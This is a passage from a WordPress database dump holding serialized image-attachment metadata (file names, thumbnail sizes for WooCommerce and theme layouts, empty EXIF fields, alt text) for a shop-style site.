idth\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:23:\"blog-img-17-300x171.png\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:23:\"blog-img-17-300x171.png\";s:5:\"width\";i:300;s:6:\"height\";i:171;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:23:\"blog-img-17-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1621,4266,'_wp_attached_file','2018/03/landing-home9-img-1.jpg'),(1622,4266,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:472;s:4:\"file\";s:31:\"2018/03/landing-home9-img-1.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"landing-home9-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home9-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"landing-home9-img-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"landing-home9-img-1-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home9-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"landing-home9-img-1-768x453.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"landing-home9-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"landing-home9-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"landing-home9-img-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"landing-home9-img-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"landing-home9-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"landing-home9-img-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home9-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1623,1813,'_wp_attachment_image_alt','a'),(1624,2478,'_wp_attachment_image_alt','a'),(1625,1814,'_wp_attached_file','2018/02/portfolio-img-12.jpg'),(1626,1814,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:28:\"2018/02/portfolio-img-12.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"portfolio-img-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"portfolio-img-12-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"portfolio-img-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"portfolio-img-12-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"portfolio-img-12-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"portfolio-img-12-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"portfolio-img-12-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"portfolio-img-12-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"portfolio-img-12-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"portfolio-img-12-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"portfolio-img-12-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-12-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1627,2479,'_wp_attached_file','2018/01/product-15.jpg'),(1628,2479,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:22:\"2018/01/product-15.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:22:\"product-15-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:22:\"product-15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:22:\"product-15-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"product-15-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"product-15-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"product-15-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"product-15-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"product-15-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:22:\"product-15-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:22:\"product-15-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:22:\"product-15-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:22:\"product-15-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:22:\"product-15-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:22:\"product-15-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1629,4266,'_wp_attachment_image_alt','l'),(1630,1074,'_wp_attached_file','2018/01/h2-slider1-graphic1.png'),(1631,1074,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:518;s:6:\"height\";i:523;s:4:\"file\";s:31:\"2018/01/h2-slider1-graphic1.png\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h2-slider1-graphic1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic1-297x300.png\";s:5:\"width\";i:297;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic1-518x300.png\";s:5:\"width\";i:518;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h2-slider1-graphic1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1632,4267,'_wp_attached_file','2018/03/landing-coming-soon-2.jpg'),(1633,4267,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:472;s:4:\"file\";s:33:\"2018/03/landing-coming-soon-2.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"landing-coming-soon-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-2-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-2-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-2-768x453.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-2-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-2-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:33:\"landing-coming-soon-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-2-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-coming-soon-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1634,3943,'_wp_attachment_image_alt','a'),(1635,1814,'_wp_attachment_image_alt','a'),(1636,2479,'_wp_attachment_image_alt','a'),(1637,1074,'_wp_attachment_image_alt','o'),(1638,4267,'_wp_attachment_image_alt','a'),(1639,1815,'_wp_attached_file','2018/02/portfolio-img-13.jpg'),(1640,1815,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:28:\"2018/02/portfolio-img-13.jpg\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"portfolio-img-13-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-13-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"portfolio-img-13-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"portfolio-img-13-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-13-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"portfolio-img-13-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"portfolio-img-13-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"portfolio-img-13-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"portfolio-img-13-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"portfolio-img-13-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"portfolio-img-13-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"portfolio-img-13-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"portfolio-img-13-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"portfolio-img-13-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1641,2480,'_wp_attached_file','2018/01/product15-gallery1.jpg'),(1642,2480,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:30:\"2018/01/product15-gallery1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"product15-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"product15-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"product15-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"product15-gallery1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"product15-gallery1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"product15-gallery1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"product15-gallery1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"product15-gallery1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"product15-gallery1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"product15-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"product15-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1643,1075,'_wp_attached_file','2018/01/h2-slider1-graphic3.png'),(1644,1075,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:131;s:6:\"height\";i:138;s:4:\"file\";s:31:\"2018/01/h2-slider1-graphic3.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1645,1075,'_wp_attachment_image_alt',''),(1646,4268,'_wp_attached_file','2018/03/landing-cinnamon-slider-1.png'),(1647,4268,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:734;s:6:\"height\";i:843;s:4:\"file\";s:37:\"2018/03/landing-cinnamon-slider-1.png\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"landing-cinnamon-slider-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-1-600x689.png\";s:5:\"width\";i:600;s:6:\"height\";i:689;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-1-261x300.png\";s:5:\"width\";i:261;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-1-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-1-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-1-734x550.png\";s:5:\"width\";i:734;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:37:\"landing-cinnamon-slider-1-550x843.png\";s:5:\"width\";i:550;s:6:\"height\";i:843;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"landing-cinnamon-slider-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11